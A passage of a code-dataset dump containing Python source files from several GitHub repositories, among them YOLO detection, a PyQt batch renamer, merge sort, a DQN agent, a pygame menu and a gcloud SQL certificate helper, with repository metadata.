\r\ndef get_classes(file) :\r\n    with open(file) as f:\r\n        name_of_class = f.readlines()\r\n\r\n    name_of_class = [ class_name.strip() for class_name in name_of_class ]\r\n\r\n    return name_of_class\r\n\r\ndef box_draw(image, boxes, scores, classes, all_classes):\r\n\r\n    for box, score, cl in zip(boxes, scores, classes):\r\n        x, y, w, h = box\r\n\r\n        top = max(0, np.floor(x + 0.5).astype(int))\r\n        left = max(0, np.floor(y + 0.5).astype(int))\r\n        right = min(image.shape[1], np.floor(x + w + 0.5).astype(int))\r\n        bottom = min(image.shape[0], np.floor(y + h + 0.5).astype(int))\r\n\r\n        cv2.rectangle(image, (top, left), (right, bottom), (255, 0, 0), 2)\r\n        cv2.putText(image, '{0} {1:.2f}'.format(all_classes[cl], score),\r\n                    (top, left - 6),\r\n                    cv2.FONT_HERSHEY_SIMPLEX,\r\n                    0.6, (0, 0, 255), 1,\r\n                    cv2.LINE_AA)\r\n\r\n        print('class: {0}, score: {1:.2f}'.format(all_classes[cl], score))\r\n        print('box coordinate x,y,w,h: {0}'.format(box))\r\n\r\n    print()\r\n\r\n\r\ndef detect_image(image, yolo, all_classes) : \r\n    \"\"\" image : the original image\r\n        yolo : the YOLO model\r\n        all_classes : the list of all class names.\r\n\r\n        returns the annotated image. \"\"\"\r\n\r\n    pimage = process_image(image)\r\n\r\n    image_boxes , image_classes , image_scores = yolo.predict(pimage,image.shape)\r\n\r\n    if image_boxes is not None :\r\n        box_draw(image, image_boxes , image_scores, image_classes, all_classes)\r\n\r\n    \r\n    return image\r\n\r\n\r\n## import the YOLO model\r\nfrom yolo.model.yolo_model import YOLO\r\n\r\n## build the YOLO model\r\nyolo = YOLO(0.3, 0.7)\r\n\r\nall_classes = get_classes('yolo/data/coco_classes.txt')\r\n\r\nimage = cv2.imread('yolo/images/test/people.JPG')\r\n\r\nresult = detect_image(image, yolo , all_classes)\r\n\r\ncv2.imshow(\"result\", result)\r\ncv2.imwrite('0.3, 0.7.jpg', result)\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()","repo_name":"rightbin/streamlit-od","sub_path":"yolo_detection.py","file_name":"yolo_detection.py","file_ext":"py","file_size_in_byte":2198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
{"seq_id":"3955017457","text":"from rest_framework.serializers import ModelSerializer\nfrom rest_framework.serializers import SerializerMethodField\nfrom django.utils import dateformat\n\nfrom api.models import Post\n\n\n# help understanding vote_score\n# https://django.cowhite.com/blog/dynamic-fields-in-django-rest-framwork-serializers/\nclass PostSerializer(ModelSerializer):\n    vote_score = SerializerMethodField(method_name='calculate_vote_score')\n    uploaded_date = SerializerMethodField(method_name='calculate_date_time')\n\n    class Meta:\n        model = Post\n        fields = (\n            'id',\n            'boast_or_roast',\n            'content',\n            'upvotes',\n            'downvotes',\n            'vote_score',\n            'uploaded_date'\n        )\n\n    def calculate_vote_score(self, instance):\n        return (instance.upvotes - instance.downvotes)\n\n    def calculate_date_time(self, instance):\n        return (dateformat.format(instance.upload_date, 'g:i A M d,Y'))\n        # return instance.upload_date\n\n\nclass UpvoteSerializer(ModelSerializer):\n    class Meta:\n        model = Post\n        fields = (\n            'upvotes',\n        )\n\n\nclass DownvoteSerializer(ModelSerializer):\n    class Meta:\n        model = Post\n        fields = (\n            'downvotes',\n        )\n","repo_name":"jsinghw/GhostPost_Backend","sub_path":"api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
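PostSerializer above derives vote_score and uploaded_date with SerializerMethodField rather than storing them. A stripped-down sketch of the same pattern, usable inside a configured Django/DRF project (hypothetical field names, and the default get_<field> method resolution instead of an explicit method_name):

    from rest_framework import serializers

    class ScoreSerializer(serializers.Serializer):
        vote_score = serializers.SerializerMethodField()

        def get_vote_score(self, obj):
            return obj['upvotes'] - obj['downvotes']

    print(ScoreSerializer({'upvotes': 7, 'downvotes': 2}).data)  # {'vote_score': 5}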
{"seq_id":"41999762630","text":"from PyQt5.Qt import Qt\nfrom PyQt5.QtCore import QUrl\nfrom PyQt5.QtGui import QIcon, QPixmap, QDesktopServices\nfrom PyQt5.QtWidgets import QWidget, QApplication, QFileDialog, QMessageBox\nimport os\n\nfrom resource.batchFilesRename_ui import Ui_Main\n\n\nclass PaneBatchFilesRename(QWidget, Ui_Main):\n    def __init__(self, parent=None, *args, **kwargs):\n        super(PaneBatchFilesRename, self).__init__(parent, *args, **kwargs)\n        # initialize data\n        self.files_name = []\n        self.new_files_name = []\n        self.files_directory = ''\n\n        self.setAttribute(Qt.WA_StyledBackground, True)\n        self.setupUi(self)\n\n    # signals\n    # slot functions\n    # add the target directory\n    def add_files_path(self):\n        # clear the displayed file list before use\n        self.files_list_text_edit.clear()\n        self.files_name.clear()\n        self.new_files_name.clear()\n        # get the directory path\n        files_directory = QFileDialog.getExistingDirectory(self, '选择一个py文件', './')\n        self.files_directory = files_directory\n        # show the path\n        self.directory_line_edit.setText(files_directory)\n        # collect the files under the directory\n        self.files_name = [files_directory + os.sep + name for name in os.listdir(files_directory) if\n                           os.path.isfile(files_directory + os.sep + name)]\n        # show the file list\n        for name in self.files_name:\n            self.files_list_text_edit.appendPlainText(name)\n\n    # preview the rename result\n    def preview_files_list(self):\n        # check whether the selected directory contains any files\n        if len(self.files_name) == 0:\n            message_box = QMessageBox(self)\n            message_box.setWindowIcon(QIcon(':/main/images/message-exclamatory-mark.PNG'))\n            message_box.setIcon(QMessageBox.Information)\n            message_box.setWindowTitle('注意:')\n            message_box.setText('当前文件夹下不存在文件,请重新添加')\n            message_box.setDetailedText('当前文件夹下不存在文件,请重新添加')\n            message_box.show()\n            return None\n        # get the rename mode\n        if self.default_radio_button.isChecked():\n            # default mode\n            # build the new file list\n            for i, element in enumerate(self.files_name):\n                new_file_name = self.files_directory + os.sep + str(i+1) + os.path.splitext(element)[-1]\n                self.new_files_name.append(new_file_name)\n                self.files_list_preview_text_edit.appendPlainText(new_file_name)\n            return None\n        if self.custom_radio_button.isChecked():\n            # custom mode\n            QMessageBox.warning(self, '警告!', '该功能还未实现,敬请期待!', QMessageBox.Cancel | QMessageBox.Cancel)\n            return None\n\n    # apply the rename\n    def apply(self):\n        if len(self.files_name) == 0 or len(self.new_files_name)==0:\n            message_box = QMessageBox(self)\n            message_box.setWindowIcon(QIcon(':/main/images/message-exclamatory-mark.PNG'))\n            message_box.setIcon(QMessageBox.Information)\n            message_box.setWindowTitle('注意:')\n            message_box.setText('请先执行预览功能,然后应用')\n            message_box.setDetailedText('请先执行预览功能,然后应用')\n            message_box.show()\n            return None\n        # perform the rename\n        # second confirmation\n        msg = QMessageBox.warning(self, '警告!', '确认执行重命名!', QMessageBox.Yes | QMessageBox.No, QMessageBox.No)\n        if msg == QMessageBox.No:\n            return None\n        # get the rename mode\n        if self.default_radio_button.isChecked():\n            # default mode\n            if len(self.files_name) == len(self.new_files_name):\n                for i in range(0,len(self.files_name)):\n                    os.rename(self.files_name[i], self.new_files_name[i])\n                    self.rename_progressBar.setValue(int((100/len(self.files_name))*(i+1)))\n                self.files_list_preview_text_edit.appendPlainText('执行完成!')\n        if self.custom_radio_button.isChecked():\n            # custom mode\n            QMessageBox.warning(self, '警告!', '该功能还未实现,敬请期待!', QMessageBox.Cancel | QMessageBox.Cancel)\n            return None\n\n    # about\n    def about(self):\n        # about dialog\n        QMessageBox.about(self, '批量重命名工具', '批量重命名工具!点击确定查看源代码')\n        QDesktopServices.openUrl(QUrl('https://github.com/nalipiaoxiang/BatchFilesRename'))\n\n\n\nif __name__ == '__main__':\n    import sys\n\n    app = QApplication(sys.argv)\n    paneBatchFilesRename = PaneBatchFilesRename()\n    paneBatchFilesRename.show()\n    sys.exit(app.exec_())\n","repo_name":"nalipiaoxiang/BatchFilesRename","sub_path":"application/Pane_BatchFilesRename.py","file_name":"Pane_BatchFilesRename.py","file_ext":"py","file_size_in_byte":4764,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"}
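The default mode in preview_files_list and apply above renames files to a 1-based running index while preserving each extension through os.path.splitext. The naming rule on its own, with hypothetical file names:

    import os

    files = ['b.txt', 'a.png', 'notes.md']
    new_names = [str(i + 1) + os.path.splitext(name)[-1] for i, name in enumerate(files)]
    print(new_names)  # ['1.txt', '2.png', '3.md']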
{"seq_id":"43216543837","text":"from Conta import Conta\r\n\r\nclass ContaCorrente(Conta):\r\n    def __init__(self, id_conta: str, saldo: float, limite_da_conta: float):\r\n        super().__init__(id_conta, saldo)\r\n\r\n        if not isinstance(limite_da_conta, float):\r\n            raise TypeError(\"O limite da conta deve ser do tipo float.\")\r\n        \r\n        self.limite_da_conta: float = limite_da_conta\r\n\r\n    def get_limite_da_conta(self):\r\n        return self.limite_da_conta\r\n    \r\n    # The new limit must be a float and non-negative.\r\n    def set_limite_da_conta(self, novo_limite):\r\n        if not isinstance(novo_limite, float):\r\n            raise TypeError(\"O novo limite deve ser do tipo float.\")\r\n        if novo_limite < 0:\r\n            raise ValueError(\"O novo limite deve ser não negativo.\")\r\n        self.limite_da_conta = novo_limite\r\n    \r\n    # Deposit amounts must be floats greater than zero.\r\n    def depositar(self, valor_de_deposito):\r\n        if not isinstance(valor_de_deposito, float):\r\n            raise TypeError(\"O valor do depósito deve ser do tipo float.\")\r\n        if valor_de_deposito <= 0:\r\n            raise ValueError(\"Valor de deposito inválido. Deve ser maior que zero.\")\r\n        self.set_saldo(self.get_saldo() + valor_de_deposito)\r\n        print(f\"Depósito no valor de R${valor_de_deposito:.2f} realizado com sucesso.\")\r\n        print(f\"Saldo atual: R${self.get_saldo():.2f}\")\r\n\r\n    # Withdrawal amounts must be floats greater than zero and no larger than the balance plus the account limit.\r\n    def sacar(self, valor_de_saque):\r\n        if not isinstance(valor_de_saque, float):\r\n            raise TypeError(\"O valor do saque deve ser do tipo float.\")\r\n        if valor_de_saque <= 0:\r\n            raise ValueError(\"Valor de saque inválido. Deve ser maior que zero.\")\r\n        if self.get_saldo() + self.get_limite_da_conta() < valor_de_saque:\r\n            raise ValueError(\"Saldo insuficiente para realizar o saque.\")\r\n        self.set_saldo(self.get_saldo() - valor_de_saque)\r\n        print(f\"Saque no valor de R${valor_de_saque:.2f} realizado com sucesso.\")\r\n        print(f\"Saldo atual: R${self.get_saldo():.2f}\")\r\n\r\n","repo_name":"LucasSenosC/Atividade_Final-SOLID","sub_path":"ContaCorrente.py","file_name":"ContaCorrente.py","file_ext":"py","file_size_in_byte":2172,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
{"seq_id":"71842837984","text":"from flask import jsonify\nfrom sqlalchemy.sql import text\nfrom SuqeBeEja import engine\n\n\ndef displaySalesPersonAccount(salesperson_id):\n    s_id = {\"id\": salesperson_id}\n    displaySellerStatement = text(\n        \"\"\"\n        SELECT * FROM sellerTable WHERE seller_id = :id\n        \"\"\"\n    )\n\n    with engine.connect() as con:\n        result = con.execute(displaySellerStatement, **s_id)\n        return jsonify({'Salesperson': [dict(row) for row in result]})\n\n\ndef displayCustomerAccount(customer_id):\n    c_id = {\"id\": customer_id}\n    displayCustomerStatement = text(\n        \"\"\"\n        SELECT * FROM customerTable \n        \"\"\"\n    )\n\n    with engine.connect() as con:\n        result = con.execute(displayCustomerStatement)\n        return jsonify({'Customer': [dict(row) for row in result]})\n","repo_name":"EshtaolGirma/SuqeBeEjeAPI","sub_path":"SuqeBeEja/service/displayAccount.py","file_name":"displayAccount.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
{"seq_id":"26468033553","text":"import numpy as np\nimport matplotlib.pyplot as plt\n# %matplotlib inline\n\nif __name__ == '__main__':\n\titers = []\t\n\tall_loss = []\n\tall_loss_bbox = []\n\tall_loss_mask = []\n\tall_accuracy_cls = []\n\tall_time = []\n\tall_lr =[]\n\n\tlog_file = './log/20181103.log'\n\n\twith open(log_file) as f:\n\t\tfor line in f:\n\t\t\tif \".yaml\" in line:\n\t\t\t\tbackbone = line.split('.yaml')[0].split('/')[-1]\n\t\t\t\tbreak\n\t\tfor line in f:\n\t\t\tif \"json_stats\" not in line:\n\t\t\t\tcontinue\n\t\t\taccuracy_cls = line.split(\"\\\"accuracy_cls\\\": \\\"\")[1].split(\"\\\"\")[0]\n\t\t\titeration = line.split(\"\\\"iter\\\": \")[1].split(\",\")[0]\n\t\t\tloss = line.split(\"\\\"loss\\\": \\\"\")[1].split(\"\\\"\")[0]\n\t\t\tloss_bbox = line.split(\"\\\"loss_bbox\\\": \\\"\")[1].split(\"\\\"\")[0]\n\t\t\tloss_mask = line.split(\"\\\"loss_mask\\\": \\\"\")[1].split(\"\\\"\")[0]\n\t\t\ttime = line.split(\"\\\"time\\\": \\\"\")[1].split(\"\\\"\")[0]\n\t\t\tlr = line.split(\"\\\"lr\\\": \\\"\")[1].split(\"\\\"\")[0]\n\n\t\t\taccuracy_cls = float(accuracy_cls)\n\t\t\titeration = int(iteration)\n\t\t\tloss = float(loss)\n\t\t\tloss_bbox = float(loss_bbox)\n\t\t\tloss_mask = float(loss_mask)\n\t\t\ttime = float(time)\n\t\t\tlr = float(lr)\n\t\t\tprint((accuracy_cls),iteration,loss,loss_bbox,loss_mask,time,lr)\n\t\t\t\n\t\t\tall_accuracy_cls.append(accuracy_cls)\n\t\t\titers.append(iteration)\n\t\t\tall_loss.append(loss)\n\t\t\tall_loss_bbox.append(loss_bbox)\n\t\t\tall_loss_mask.append(loss_mask)\n\t\t\tall_time.append(time)\n\t\t\tall_lr.append(lr)\n\n\tfig = plt.figure(figsize=(8,6))\n\tax2 = fig.add_subplot(111)\n\tax1 = ax2.twinx()\n
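The plot below overlays loss and accuracy curves on one y-axis and the learning rate on a second y-axis sharing the same x-axis via twinx(). A minimal version of that layout with made-up data:

    import matplotlib.pyplot as plt

    fig, ax_lr = plt.subplots()
    ax_loss = ax_lr.twinx()                       # second y-axis, shared x
    ax_loss.plot([0, 1, 2], [1.0, 0.6, 0.4], color='red', label='loss')
    ax_lr.plot([0, 1, 2], [0.01, 0.01, 0.001], color='black', label='lr')
    ax_loss.set_ylabel('loss')
    ax_lr.set_ylabel('learning rate')
    plt.show()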
\n\n\tax1.plot(iters, all_loss, color='red', label='loss')\n\tax1.plot(iters, all_loss_bbox, color='purple', label='loss_bbox')\n\tax1.plot(iters, all_loss_mask, color='blue', label='loss_mask')\n\tax1.plot(iters, all_accuracy_cls, color='orange', label='accuracy_cls')\n\tax1.plot(iters, all_time, color='olive', label='time/20iters')\n\t# set axis ranges\n\tax1.set_xlim((0,iters[-1]))\n\tax1.set_ylim((0,1))\n\n\t# set axis labels and figure title\n\tax1.set_xlabel('iters')\n\tlog_name = log_file.split('.log')[0].split('/')[-1]\n\tax1.set_title(log_name + ': ' +backbone)\n\n\t\n\tax2.plot(iters, all_lr, color='black', label='lr')\n\n\tax2.set_ylim([0, max(all_lr)*1.1])\n\tax1.legend(loc='upper right')\n\tax2.legend(loc='center right')\n\n\n\tax1.set_ylabel('loss and accuracy')\n\tax2.set_ylabel('learning rate')\n\n\tplt.savefig('./log/'+ log_name + '.png')\n\tplt.show()\n","repo_name":"pascal1129/kaggle_airbus_ship_detection","sub_path":"2_model/analyse_log.py","file_name":"analyse_log.py","file_ext":"py","file_size_in_byte":2257,"program_lang":"python","lang":"en","doc_type":"code","stars":259,"dataset":"github-code","pt":"7"}
{"seq_id":"23725495161","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Apr 16 01:22:46 2019\r\n\r\n@author: Aditya Chondke\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport cv2\r\nfrom numba import jit,double\r\nimport time\r\n\r\n\r\ndef gaussian(image,fil):\r\n    image_out = np.array(image.copy())\r\n\r\n    (h,w) = image.shape\r\n    (hf,wf)=fil.shape\r\n    hf2=hf//2\r\n    wf2=wf//2\r\n    \r\n    for i in range(hf2, h-hf2):\r\n        for j in range(wf2, w-wf2):\r\n            tsum=0\r\n            for ii in range(hf):\r\n                for jj in range(wf):\r\n                    tsum=tsum+(image[i-hf2+ii,j-wf2+jj]*fil[hf-1-ii,wf-1-jj])\r\n            \r\n            image_out[i][j]=tsum\r\n    \r\n    return image_out\r\n\r\n\r\n\r\nimage =np.array(cv2.imread('Input Image path',cv2.IMREAD_GRAYSCALE))\r\ngauss2=np.array([[1/16,1/8,1/16],[1/8,1/4,1/8],[1/16,1/8,1/16]])\r\n\r\ngaussian_fast = jit(double[:,:](double[:,:], double[:,:]))(gaussian)\r\n\r\nstart=time.time()\r\nimage_out=gaussian_fast(image,gauss2)\r\nend=time.time() \r\n \r\nprint(end-start) \r\ncv2.imwrite('Output image path' , image_out)\r\n\r\n\r\n","repo_name":"AdityaChondke/CannyEdgeDectector","sub_path":"Gaussian_parallel_code.py","file_name":"Gaussian_parallel_code.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
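The gaussian() loop above computes, for every pixel, a kernel-weighted sum over its neighbourhood with the kernel indexed in flipped order (a true convolution; for this symmetric kernel the flip is a no-op). The arithmetic checked on one hypothetical 3x3 patch:

    import numpy as np

    patch = np.arange(9, dtype=float).reshape(3, 3)     # hypothetical image patch
    kernel = np.array([[1/16, 1/8, 1/16],
                       [1/8,  1/4, 1/8],
                       [1/16, 1/8, 1/16]])
    out = np.sum(patch * kernel[::-1, ::-1])            # correlate with the flipped kernel
    print(out)  # 4.0, the smoothed centre value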
{"seq_id":"39795439439","text":"def merge_sort(L):\n    '''Merge sort implemented recursively, top down:\n    1. Recursively split the sequence into left and right halves; first recurse on left = merge_sort(L[:mid]).\n       Keep recursing on the left until, at some level, the left sub-sequence holds a single element, then return\n       to the caller one level up, i.e. left receives the return value;\n       then, in that caller, recurse on right = merge_sort(L[mid:]).\n       When the right sub-sequence holds a single element, return upward and right receives the return value.\n    2. Once left and right are both assigned single-element sub-sequences, perform the merge step and hand the\n       sorted sequence back to the caller one level up, i.e. the caller's left or right is assigned the\n       recursive return value.\n\n    If this is unclear, see the illustrated explanation on my blog: http://www.madmalls.com/blog/post/merge-sort-algorithm/\n    '''\n    n = len(L)\n    # This check serves two purposes:\n    # 1. if the caller passes a sequence with zero or one element, there is nothing to sort, so return it directly\n    # 2. it is the recursion's exit condition: a sub-sequence with a single element is no longer split and is returned\n    if n <= 1:\n        return L\n\n    # split the input sequence into left and right halves, then recurse on each\n    mid = n // 2\n    left = merge_sort(L[:mid])  # note: the left side recurses first, down to single-element sub-sequences, before returning upward. E.g. for L = [54, 26, 93, 17, 77, 31, 44, 55, 20], the slice [54, 26, 93, 17] is fully merge-sorted before the right side is touched\n    right = merge_sort(L[mid:])\n\n    # perform the merge and return the result to the merge_sort() call one level up the stack\n    return merge(left, right)\n\n\ndef merge(left, right):\n    '''Merge step, using movable cursors'''\n    left_index = 0  # movable index into the left sequence\n    right_index = 0  # movable index into the right sequence\n    merged = []  # holds the final sorted elements\n\n    while left_index < len(left) and right_index < len(right):  # exit the loop as soon as either sequence is exhausted\n        if left[left_index] < right[right_index]:\n            merged.append(left[left_index])\n            left_index += 1  # move the left index one step to the right\n        else:\n            merged.append(right[right_index])\n            right_index += 1  # move the right index one step to the right\n\n    merged = merged + left[left_index:]  # in case the left sequence still has unprocessed elements\n    merged = merged + right[right_index:]  # in case the right sequence still has unprocessed elements\n    return merged\n\n\ndef is_sorted(L):\n    '''Helper: checks that the output of merge_sort is a correctly ascending sequence'''\n    prev = L[0]\n    for i in range(1, len(L)):\n        if prev > L[i]:\n            print('Sort ascending failed.')\n            return False\n        prev = L[i]\n    print('Sort ascending succeed.')\n    return True\n\n\nif __name__ == '__main__':\n    L1 = [54, 26, 93, 17, 77, 31, 44, 55, 20]\n    print('Before: ', L1)\n    merged = merge_sort(L1)\n    if is_sorted(merged):\n        print('After: ', merged)\n\n    # Output:\n    # Before:  [54, 26, 93, 17, 77, 31, 44, 55, 20]\n    # Sort ascending succeed.\n    # After:  [17, 20, 26, 31, 44, 54, 55, 77, 93]\n\n    '''\n    Stress test. With timeit.timeit(), importing the list via \"from __main__ import L\" seems to give wrong results,\n    so the same L is initialized inside the function:\n\n    from timeit import timeit\n\n    def test():\n        # import random\n        # gen = (random.randint(1, 100) for i in range(100))  # generate 100 random integers between 1 and 100\n        # L = list(gen)\n        L = [96, 2, 65, 23, 47, 58, 8, 48, 69, 92, 34, 83, 93, 47, 45, 55, 95, 15, 92, 24, 64, 19, 29, 55, 35, 48, 39, 29, 63, 94, 99, 38, 50, 10, 10, 93, 74, 27, 74, 44, 29, 81, 85, 86, 74, 30, 50, 50, 12, 12, 38, 75, 41, 87, 80, 97, 16, 48, 65, 69, 83, 71, 28, 9, 64, 69, 27, 74, 74, 86, 40, 69, 79, 79, 77, 100, 53, 72, 77, 16, 8, 36, 41, 58, 59, 29, 46, 79, 81, 66, 8, 35, 60, 52, 2, 82, 2, 36, 79, 66]\n        merge_sort(L)\n\n    def merge_sort(L):\n        n = len(L)\n        if n <= 1:\n            return L\n\n        mid = n // 2\n        left = merge_sort(L[:mid])\n        right = merge_sort(L[mid:])\n\n        return merge(left, right)\n\n    def merge(left, right):\n        merged, left_index, right_index = [], 0, 0\n        while left_index < len(left) and right_index < len(right):\n            if left[left_index] < right[right_index]:\n                merged.append(left[left_index])\n                left_index += 1\n            else:\n                merged.append(right[right_index])\n                right_index += 1\n        return merged + left[left_index:] + right[right_index:]\n\n\n    print('Merge sort function run 1000 times, cost: ', timeit('test()', 'from __main__ import test', number=1000), 'seconds.')\n\n\n    # Output:\n    # Merge sort function run 1000 times, cost:  0.5221137649991934 seconds.\n    '''\n","repo_name":"wangy8961/python3-algorithms","sub_path":"4. 排序算法 - Sorting/5. 归并排序 - Merge Sort/1_recursive_merge_sort_asc.py","file_name":"1_recursive_merge_sort_asc.py","file_ext":"py","file_size_in_byte":4817,"program_lang":"python","lang":"zh","doc_type":"code","stars":82,"dataset":"github-code","pt":"7"}
{"seq_id":"20120819787","text":"import copy\n\nimport numpy as np\nimport torch\nimport torch.nn.functional as F\nfrom network import AtariModel\nfrom torch.optim import Adam\n\nfrom rltoolkit.models.utils import hard_target_update\nfrom rltoolkit.utils.scheduler import LinearDecayScheduler\n\n\nclass Agent(object):\n    \"\"\"Agent.\n\n    Args:\n        algo (`Algorithm`): algorithm to be used in this agent.\n        action_dim (int): action space dimension\n        total_step (int): total epsilon decay steps\n        learning_rate (float): initial learning rate\n        update_target_step (int): target network update frequency\n    \"\"\"\n\n    def __init__(self,\n                 action_dim: int,\n                 algo: str = 'dqn',\n                 gamma: float = 0.99,\n                 epsilon: float = 1.0,\n                 learning_rate: float = 0.001,\n                 total_step: int = 1000000,\n                 update_target_step: int = 100,\n                 device='cpu'):\n        super().__init__()\n\n        self.algo = algo\n        self.gamma = gamma\n        self.epsilon = epsilon\n        self.lr_end = 0.00001\n        self.global_update_step = 0\n        self.update_target_step = update_target_step\n        self.action_dim = action_dim\n\n        # Main network\n        if algo in ['dqn', 'ddqn']:\n            self.qnet = AtariModel(\n                act_dim=action_dim, dueling=False).to(device)\n        elif algo in ['duling_dqn', 'duling_ddqn']:\n            self.qnet = AtariModel(act_dim=action_dim, dueling=True).to(device)\n\n        # Target network\n        self.target_qnet = copy.deepcopy(self.qnet)\n        # Create an optimizer\n        self.optimizer = Adam(self.qnet.parameters(), lr=learning_rate)\n        self.lr_scheduler = LinearDecayScheduler(learning_rate, total_step)\n\n        self.device = device\n\n    def sample(self, obs) -> int:\n        \"\"\"Sample an action when given an observation. Based on the current\n        epsilon value, either a greedy action or a random action will be\n        returned.\n\n        Args:\n            obs: current observation\n\n        Returns:\n            act (int): action\n        \"\"\"\n        # Choose a random action with probability epsilon\n        if np.random.rand() <= self.epsilon:\n            act = np.random.randint(self.action_dim)\n        else:\n            # Choose the action with highest Q-value at the current state\n            act = self.predict(obs)\n\n        return act\n\n    def predict(self, obs) -> int:\n        \"\"\"Predict an action when given an observation; a greedy action will be\n        returned.\n\n        Args:\n            obs (np.float32): shape of (3, 84, 84) or (1, 3, 84, 84), current observation\n\n        Returns:\n            act(int): action\n        \"\"\"\n        if obs.ndim == 3: # if obs is 3 dimensional, we need to expand it to have batch_size = 1\n            obs = np.expand_dims(obs, axis=0)\n        obs = torch.tensor(obs, dtype=torch.float, device=self.device)\n        pred_q = self.qnet(obs).cpu().detach().numpy().squeeze()\n        best_actions = np.where(pred_q == pred_q.max())[0]\n        select_action = np.random.choice(best_actions)\n        return select_action\n
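sample() and predict() above implement epsilon-greedy exploration with uniform tie-breaking among equally-valued actions. The same policy reduced to a standalone function over hypothetical Q-values:

    import numpy as np

    def epsilon_greedy(q_values, epsilon):
        if np.random.rand() <= epsilon:
            return np.random.randint(len(q_values))      # explore
        best = np.where(q_values == q_values.max())[0]   # all argmax indices
        return np.random.choice(best)                    # break ties uniformly

    print(epsilon_greedy(np.array([0.1, 0.9, 0.9]), epsilon=0.05))  # usually 1 or 2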
\n    def learn(self, obs: torch.Tensor, action: torch.Tensor,\n              reward: torch.Tensor, next_obs: torch.Tensor,\n              terminal: torch.Tensor) -> float:\n        \"\"\"Update the model with a batch of transitions.\n\n        Args:\n            obs (np.float32): shape of (batch_size, obs_dim)\n            act (np.int32): shape of (batch_size)\n            reward (np.float32): shape of (batch_size)\n            next_obs (np.float32): shape of (batch_size, obs_dim)\n            terminal (np.float32): shape of (batch_size)\n\n        Returns:\n            loss (float)\n        \"\"\"\n        if self.global_update_step % self.update_target_step == 0:\n            hard_target_update(self.qnet, self.target_qnet)\n\n        reward = np.clip(reward, -1, 1)\n\n        action = action.to(self.device, dtype=torch.long)\n\n        # Prediction Q(s)\n        pred_value = self.qnet(obs).gather(1, action)\n\n        # Target for Q regression\n        if self.algo in ['dqn', 'duling_dqn']:\n            next_q_value = self.target_qnet(next_obs).max(1, keepdim=True)[0]\n\n        elif self.algo in ['ddqn', 'duling_ddqn']:\n            greedy_action = self.qnet(next_obs).max(dim=1, keepdim=True)[1]\n            next_q_value = self.target_qnet(next_obs).gather(1, greedy_action)\n\n        target = reward + (1 - terminal) * self.gamma * next_q_value\n\n        # MSE loss on the TD target\n        loss = F.mse_loss(pred_value, target)\n        # gradients accumulate by default in PyTorch, so zero them explicitly first\n        self.optimizer.zero_grad()\n        # backpropagate, then apply the parameter update\n        loss.backward()\n        self.optimizer.step()\n\n        # learning rate decay\n        for param_group in self.optimizer.param_groups:\n            param_group['lr'] = max(self.lr_scheduler.step(1), self.lr_end)\n\n        self.global_update_step += 1\n        return loss.item()\n","repo_name":"jianzhnie/deep-rl-toolkit","sub_path":"examples/tutorials/DQN-Atari/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":4990,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"7"}
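learn() above switches the bootstrap target by algorithm: plain DQN maxes over the target network directly, while Double DQN takes the argmax from the online network and reads its value from the target network. Both targets on toy tensors:

    import torch

    q_next_online = torch.tensor([[1.0, 3.0]])   # online net on next_obs (hypothetical)
    q_next_target = torch.tensor([[2.0, 0.5]])   # target net on next_obs (hypothetical)

    dqn_target = q_next_target.max(1, keepdim=True)[0]     # 2.0
    a_star = q_next_online.max(dim=1, keepdim=True)[1]     # online argmax: action 1
    ddqn_target = q_next_target.gather(1, a_star)          # 0.5
    print(dqn_target.item(), ddqn_target.item())  # 2.0 0.5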
(0, 0))\n self.screen.blit(self.bg_letras,(0,self.pos))\n self.screen.blit(self.bg_letras,(0,self.pos - self.height))\n self.screen.blit(self.Github, (0, 0))\n self.menu.draw(self.screen)\n pygame.display.flip()\n\n def handleInput(self):\n input = pygame.event.get()\n for event in input:\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n self.menu.handelInput(input,self.screen)\n\n def run(self):\n while True:\n\n self.clock.tick(60)\n self.handleInput()\n self.draw()\n if self.pos >= self.height:\n self.pos = 0\n self.pos += 1\n\n\nrun = main(Width, Height)\nrun.run()","repo_name":"jooherrera/juegoSilabas","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"27763938369","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import unicode_literals\n\n\ndef GetCertRefFromName(sql_client, sql_messages, resources, instance_ref,\n common_name):\n \"\"\"Get a cert reference for a particular instance, given its common name.\n\n Args:\n sql_client: apitools.BaseApiClient, A working client for the sql version to\n be used.\n sql_messages: module, The module that defines the messages for the sql\n version to be used.\n resources: resources.Registry, The registry that can create resource refs\n for the sql version to be used.\n instance_ref: resources.Resource, The instance whose ssl cert is being\n fetched.\n common_name: str, The common name of the ssl cert to be fetched.\n\n Returns:\n resources.Resource, A ref for the ssl cert being fetched. Or None if it\n could not be found.\n \"\"\"\n cert = GetCertFromName(sql_client, sql_messages, instance_ref, common_name)\n\n if not cert:\n return None\n\n return resources.Create(\n collection='sql.sslCerts',\n project=instance_ref.project,\n instance=instance_ref.instance,\n sha1Fingerprint=cert.sha1Fingerprint)\n\n\ndef GetCertFromName(sql_client, sql_messages, instance_ref, common_name):\n \"\"\"Get a cert for a particular instance, given its common name.\n\n In the SQL API, the last parameter of the URL is the sha1fingerprint, which is\n not something writeable or readable by humans. Instead, the CLI will ask for\n the common name. To allow this, we first query all the ssl certs for the\n instance, and iterate through them to find the one with the correct common\n name.\n\n Args:\n sql_client: apitools.BaseApiClient, A working client for the sql version to\n be used.\n sql_messages: module, The module that defines the messages for the sql\n version to be used.\n instance_ref: resources.Resource, The instance whose 